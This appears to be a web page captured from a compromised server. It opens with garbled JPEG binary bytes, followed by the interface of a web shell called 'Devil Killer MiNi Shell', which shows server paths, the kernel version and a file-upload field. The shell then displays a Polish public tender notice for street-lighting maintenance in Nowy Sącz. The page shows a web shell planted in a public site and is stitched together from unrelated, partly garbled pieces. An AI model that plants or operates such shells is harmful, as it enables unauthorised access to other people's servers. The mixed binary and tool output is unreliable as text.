JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241209/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241209/0064193301-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Bieżące utrzymanie i konserwacja oświetlenia ulicznego Miasta Nowego Sącza w terminie od 01.01.2025 r. do 30.06.2025 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Zarząd Dróg w Nowym Sączu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 490580733</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Wyspiańskiego 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowy Sącz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mzd.nowysacz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.mzd.nowysacz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bieżące utrzymanie i konserwacja oświetlenia ulicznego Miasta Nowego Sącza w terminie od 01.01.2025 r. do 30.06.2025 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-745a052a-fae5-4022-b750-fa602bfc2d36</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00641933</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-12-09</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.mzd.nowysacz.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">www.mzd.nowysacz.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z uwzględnieniem wyjątków określonych w ustawie PZP., odbywa się przy użyciu środków komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2024 r. poz. 1513). <br/>2.	Ofertę, oświadczenia, podmiotowe środki dowodowe, pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci elektronicznej, w ogólnie dostępnych formatach danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt. <br/>3. Zawiadomienia, oświadczenia, wnioski lub informacje Wykonawcy przekazują 1) drogą elektroniczną na adres e-mail: sekretariat@mzd.nowysacz.pl <br/>2) za pośrednictwem elektronicznej platformy usług administracji publicznej obywatel.gov.pl na adres Miejski Zarząd Dróg 33 – 300 Nowy Sącz (/MZD/SkrytkaESP).<br/>3) poprzez platformę zakupowa pod adresem: www.platformazakupowa.pl.<br/>4.	Ofertę wraz z załącznikami, których Zamawiający wymaga do dołączenia do oferty, Wykonawcy składają za pośrednictwem Platformy pod adresem: www.platformazakupowa.pl <br/>5.	Domniemywa się, że pismo wysłane przez Zamawiającego na numer faksu albo adres poczty e-mail podane przez Wykonawcę (w ofercie) zostało mu doręczone w momencie jego przekazania przez Zamawiającego – dowód transmisji danych, w sposób umożliwiający zapoznanie się Wykonawcy z jego treścią, chyba, że Wykonawca wezwany przez Zamawiającego do potwierdzenia otrzymania oświadczenia, wniosku, zawiadomienia lub informacji w sposób określony powyżej oświadczy, iż w/w wiadomości nie otrzyma. <br/>6.	Osobami upoważnionymi do porozumiewania się ze strony Zamawiającego są: 1) Konrad Poręba.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">271.2.43.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest pełnienie całodobowej konserwacji oraz nadzoru nad eksploatacją urządzeń energetycznych i odbiorczych stałego oświetlenia ulic, mostów, tuneli, placów, skwerów, otwartych parków <br/>i zieleńców, iluminacji obiektów architektonicznych na terenie miasta Nowego Sącza. Zamawiający przewiduje do całodobowej konserwacji następujące urządzenia:<br/>	6 370 szt. latarni,<br/>	2 381 szt. punktów świetlnych na linii napowietrznej wspólnej,<br/>	209 szt. szaf sterowniczych oświetlenia ulicznego.<br/>	449 szt. punktów doświetlających przejścia dla pieszych<br/>	Iluminacja świąteczna<br/><br/>Powyższe dane mogą ulec zmianie w zależności od skali prac modernizacyjnych wykonywanych w mieście Nowy Sącz. <br/>W podstawowy zakres konserwacji i utrzymania wchodzi <br/>a)	Dokonywanie oględzin i oceny stanu technicznego urządzeń:<br/>	stanu widocznych części przewodów, ich połączeń, oraz słupów oświetleniowych i osprzętu (opraw oświetleniowych, źródeł oświetlenia, zamknięć wnęk w słupach, powierzchni lakierniczej słupów, czystości kloszy opraw i itp.),<br/>	stanu urządzeń zabezpieczających, sterowania i pomiarowych,<br/>układów zapłonowych opraw, ochronników itd. <br/>	opisów obwodów w szafkach i tablicach sterowniczych,<br/>	stanu opisów ostrzegawczych, informacyjnych i oznakowania latarń,<br/>	prawidłowości działania elementów zasilających i urządzeń sterowniczych<br/>	stanu izolacji i sprawdzenie skuteczności działania ochrony przeciwporażeniowej, oraz usuwanie nieprawidłowości stwierdzonych podczas oględzin.<br/>b)	Wymianę uszkodzonych źródeł światła, oprawek, dławików i kondensatorów itd.<br/>c)	Utylizacja zdemontowanych urządzeń nienadających się do powtórnego wykorzystania.<br/>d)	Wymianę uszkodzonych wysięgników, drzwiczek i tablic bezpiecznikowych słupowych itd. <br/>e)	Regulację położenia opraw i odbłyśników oraz zwisów przewodów oświetlenia drogowego itd.<br/>f)	Napraw tablic rozdzielczych, szaf oświetleniowych (wymiana zamków, rygli, drzwiczek) oraz wyposażenia (zegary , bezpieczniki, wyłączniki, styczniki itp.).<br/>g)	Likwidację zagrożeń dla osób postronnych, wynikłych z losowych zdarzeń (wypadek drogowy, wichura, powódź, wandalizm, kradzież, itp.) uszkodzeń urządzeń oświetleniowych.<br/>h)	Lokalizacja uszkodzeń linii kablowych i napowietrznych..<br/>i)	Przycinanie	gałęzi drzew przysłaniających oprawy oświetleniowe oraz pochłaniające strumień świetlny, jak również powodujące zbliżenie do przewodów linii napowietrznych.<br/>j)	Kontrolę czasu zapalania i wyłączania oświetlenia.<br/>k)	Utrzymanie świecenia wszystkich opraw świetlnych w ustalonych godzinach, w odniesieniu do czasu wschodu i zachodu słońca.<br/>l)	Zamawiający może zlecić ustawienie zegarów wg wskazanego czasu załączania/wyłączania poszczególnych obwodów oświetlenia.<br/>m) Sprawdzanie posadowienia i przywracanie pionowości słupów oświetleniowych.<br/>n)	Malowanie i konserwacja metalowych konstrukcji latarń, tablic rozdzielczych i szafek oraz numeracji słupów oświetleniowych.<br/>o)	Usuwanie usterek i awarii sieci bez zbędnej zwłoki, a w przypadku typowych napraw eksploatacyjnych (w szczególności robót polegających na wymianie źródeł światła) nie później niż w ciągu 12 h od chwili powiadomienia lub w terminie uzgodnionym z Zamawiającym- Wykonawca każdorazowo na piśmie powiadomi Zamawiającego o fakcie i terminie usunięcia awarii.<br/>p)	Wykonawca potwierdzi raportem wykonanie czynności na poszczególnych obiektach - wskazując miejsce prac, ich zakres oraz termin realizacji dołączając raport do faktury z miesiąca wykonania.<br/>q)	Wykonawca powinien uzyskać prawo wstępu do stacji trafo, na słupy energetyczne będące własnością firmy TAURON Dystrybucja S.A., w celu wykonania niezbędnych prac będących przedmiotem zamówienia zgodnie z obowiązującymi przepisami.<br/>r)	W/w zadania Wykonawca będzie realizował zgodnie z obowiązującymi w tym zakresie przepisami, a szczególnie ustawą z dnia 10 kwietnia 1997r. Prawo energetyczne (tj. Dz. U. z 2024r., poz. 266 z późn. zm.) oraz zgodnie z instrukcją Instrukcja organizacji bezpiecznej pracy przy urządzeniach energetycznych w TAURON Dystrybucja S.A.<br/>s)	Mycie i czyszczenie opraw, słupów.<br/>t)	Wykonywanie min. 1 raz w tygodniu objazdów kontrolnych działania oświetlenia ulicznego.<br/>u)	Wykonywanie pomiarów:<br/>	skuteczności ochrony przeciwporażeniowej,<br/>	rezystancji izolacji,<br/>	innych wymaganych pomiarów w sposób i z częstotliwością określoną w szczegółowych przepisach oraz na wniosek Zamawiającego,<br/>	usuwanie nieprawidłowości stwierdzonych w wyniku przeprowadzonych pomiarów,<br/>	prowadzenie wymaganej przepisami dokumentacji eksploatacyjnej oświetlenia drogowego.<br/>Ponadto, w ramach zamówienia wykonawca zobowiązany jest do wykonania dodatkowych usług tzn. montażu i demontażu dekoracji świąteczno-zimowej w terminie ustalonym z Zamawiającym, pomoc w pracach inwestycyjnych wykonywanych przez Zamawiającego w zakresie oświetlenia ulicznego, obsługa elektroenergetyczna imprez organizowanych przez Urząd Miasta Nowego Sącza. Zakres prac określony został w Instrukcji Konserwacji oraz nadzoru nad eksploatacją energetycznych urządzeń oświetlenia zewnętrznego Miasta Nowego Sącza. <br/>	W ramach obowiązków związanych z realizacją usługi konserwacji oświetlenia ulicznego Wykonawca zobowiązany będzie do pełnienia całodobowego dyżuru telefonicznego dla osób zgłaszających usterki, awarie w oświetleniu zewnętrznego. <br/>	Wykonawca zobowiązany jest do prowadzenia rejestru rozmów z danego numeru telefonu …………………../Wykonawca jest zobowiązany do podania numeru tel./ zgłaszających usterki, awarie, które winny być archiwizowane przez 72 godziny i przekazywanie na wezwanie MZD Nowy Sącz. Rejestr po-winien zawierać liczbę porządkową, nr telefonu, dane zgłaszającego, czas zgłoszenia (data godzina), treść zgłoszenia, sposób załatwienia zgłoszenia. <br/>	Wykonawca zobowiązany jest przystąpić do usuwania usterki, awarii w celu przywrócenia sprawności instalacji oświetlenia ulicznego niezwłocznie od chwili zgłoszenia o takim zagrożeniu oraz doprowadzić uszkodzone urządzenia do prawidłowego stanu technicznego w ciągu………./kryterium oceny oferty/, chyba że dłuższy okres konieczny jest ze względu na rodzaj i zakres uszkodzenia lub awarii. Nie dotyczy to sytuacji, w których usterka powoduje zagrożenia życia i zdrowia ludzi, gdzie czas na usunięcie awarii wynosi od 2 do 12 godzin. <br/>	Wykonawca zobowiązany jest do magazynowania i zabezpieczenia zdemontowanych urządzeń oświetlenia zewnętrznego nadającego się do powtórnego wykorzystania, elementów iluminacji świątecznej i materiałów przeznaczonych do konserwacji i utrzymania oświetlenia ulicznego. <br/>	Materiały i urządzenia do realizacji inwestycji niniejszej umowy dostarcza Zamawiający za pośrednictwem Dostawcy, do siedziby firmy konserwatora z wyłączeniem pod-stawowych narzędzi niezbędnych do bieżącej realizacji niniejszej umowy, które zobowiązany jest zapewnić Wykonawca. <br/>	Wykonawca ponosi koszt transportu, załadunku i rozładunku do magazynu i utrzymania w nim materiałów do konserwacji oświetlenia ulicznego, a także za wszystkie koszty związane z przejęciem materiałów (transport, załadunek o rozładunek itd.) od Wykonawcy uprzednio zajmującego się bieżącym utrzymaniem i konserwacją oświetlenia ulicznego w mieście Nowy Sącz, w razie jego zmiany.<br/><br/>W przypadku prac polegających na wymianie uszkodzonych latarni, dekoracji świątecznej bądź ich elementów Wykonawca zobowiązany jest przesłać Zamawiającemu dokumentację fotograficzną stanu sprzed i po naprawie Wykonawca zobowiązany jest przechowywać ww. dokumentację fotograficzną do 3 miesięcy od dnia dokonania naprawy. <br/><br/>Przedmiot zamówienia, został szczegółowo opisany w dokumentacji technicznej, stanowiącej załącznik nr 12 do SWZ tj.:<br/>	Wykazie ilości opraw oświetlenia drogowego stanowiących własność Miasta Nowego Sącza zawieszonych na słupach elektroenergetycznych TAURON Dystrybucja;<br/>	Wykazie punktów pomiarowych/szaf oświetlenia ulicznego;<br/>	Instrukcji konserwacji oraz nadzoru nad eksploatacją energetycznych urządzeń oświetlenia ulic miasta Nowego Sącza;<br/>	Wykaz dekoracji świąteczno-zimowej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">50800000-3 - Różne usługi w zakresie napraw i konserwacji</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">50232000-0 - Usługi w zakresie konserwacji publicznych instalacji oświetleniowych i sygnalizatorów</p> <p class="mb-0">50232110-4 - Obsługa instalacji oświetlenia publicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówienia, o którym mowa w art. 214 ust. 1 pkt. 7 ustawy PZP, polegającego na powtórzeniu podobnych usług. Całkowita wartość tego zamówienia wynosi nie więcej niż 100 000,00 zł.<br/>Zamówienie, o którym mowa w art. 214 ust. 1 pkt 7 ustawy PZP zostanie udzielone wykonawcy zamówienia podstawowego pod warunkiem, że:<br/>1)	Na dzień udzielenia zamówienia, o którym mowa w ust. 2, wykonawca spełnia warunki udziału w postępowaniu, wskazane dla zamówienia podstawowego;<br/>2)	Nie podlega wykluczeniu z postępowania w trybie art. 108 ust. 1 oraz art. 109 ust. 1 pkt. 1 – 5 i 7 – 10;</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">W celu wyboru najkorzystniejsze oferty, Zamawiający będzie się kierował kryteriami oceny ofert:<br/>1)	cena – 60%<br/>2)	czas usunięcia awarii od zgłoszenia – 40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas usunięcia awarii od zgłoszenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit a</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit b</p> <p class="mb-0">Art. 109 ust. 1 pkt 2 lit c</p> <p class="mb-0">Art. 109 ust. 1 pkt 3</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	Nie podlegają wykluczeniu.<br/>2)	Spełniają warunki udziału w postępowaniu, w zakresie:<br/>a)	kompetencji lub uprawnień do prowadzenia określonej działalności zawodowej – Zamawiający nie precyzuje szczegółowych wymagań;<br/>b)	sytuacji ekonomicznej lub finansowej – należy wykazać, że Wykonawca<br/>	posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 100 000,00 zł na jedno i wszystkie zdarzenia. <br/>c)	zdolności technicznej lub zawodowej – należy wykazać, że Wykonawca:<br/>	w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał, a w przypadku świadczeń okresowych lub ciągłych wykonuje w sposób należyty przez okres co najmniej 6 kolejnych pełnych miesięcy kalendarzowych co najmniej jedną usługę polegającą na bieżącej konserwacji oświetlenia ulicznego, w ramach której konserwacji podlegało/podlega nie mniej niż 300 punktów świetlnych oraz nie mniej niż 10 skrzyń oświetlenia ulicznego. Zamawiający nie dopuszcza sumowania usług wykonanych na podstawie więcej niż jednej umowy.<br/>	przy realizacji zamówienia będzie dysponował osobami zdolnymi do wykonania zamówienia, tj.:<br/>•	minimum 1 osobą nadzorującą, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, ważne świadectwo kwalifikacyjne „D&#34; i ważne świadectwo kwalifikacyjne „E&#34;<br/>•	minimum 1 osobą posiadającą ważne świadectwo kwalifikacyjne „D&#34; i ważne świadectwo kwalifikacyjne „E&#34;;<br/>•	minimum 2 pracownikami posiadającymi uprawnienia do wykonywania prac pod napięciem na urządzeniach elektroenergetycznych PPN (Prace Pod Napięciem) wraz z aktualnym upoważnieniem do prac pod napięciem na sieciach TAURON Dystrybucja S.A. i ważne świadectwo kwalifikacyjne „E&#34;<br/>•	minimum 4 pracownikami z aktualnymi badaniami upoważniającymi do pracy na wysokości powyżej 3 m i ważnymi świadectwami kwalifikacyjnymi „E&#34;<br/>•	minimum 2 osobami posiadającymi uprawnienia do obsługi podnośnika koszowego wydanymi przez Urząd Dozoru Technicznego i ważne świadectwo kwalifikacyjne „E&#34;<br/>•	minimum 1 osobą posiadającą upoważnienie do sporządzania pisemnych poleceń do pracy pod napięciem na sieciach TAURON Dystrybucja S.A., posiadającą ważne świadectwo kwalifikacyjne „E&#34;<br/><br/>	przy realizacji zamówienia będzie dysponował niezbędnymi do wykonania zamówienia narzędziami, wyposażeniem zakładu tj.:<br/>•	minimum 1 podnośnikiem samochodowym z koszem izolowanym dopuszczonym do pracy pod napięciem, zgodnie z wymaganiami określonymi w instrukcji PPN (Praca Pod Napięciem),<br/>•	minimum 1 samochodem pogotowia oświetleniowego do 3,5t wyposażonym w środki łączności i oznakowanym sygnałem świetlnym, <br/>•	minimum 2 generatorami prądotwórczymi, każdy o mocy minimum 3 kW,<br/>•	minimum 1 ubijakiem mechanicznym (do zagęszczania gruntu),<br/>•	minimum 1 przecinarką do nawierzchni asfaltowych i betonowych,<br/>•	minimum 1 pilarką spalinową,<br/>•	minimum 1 urządzeniem do wykrywania uszkodzeń kabli energetycznych oświetlenia ulicznego w ziemi,<br/>•	bazą logistyczną (zaplecze techniczne warsztatowe, magazynowe, baza sprzętu i transportu) gwarantującą dotrzymanie warunków terminowych realizacji przedmiotu umowy w odległości nie większej niż 10 km od granic administracyjnych miasta Nowego Sącza oraz posiadanie powierzchni magazynowej około 600 m2 do składowania elementów oświetlenia świątecznego. Uzasadnieniem wymogu dot. lokalizacji magazynu jest konieczność swobodnej 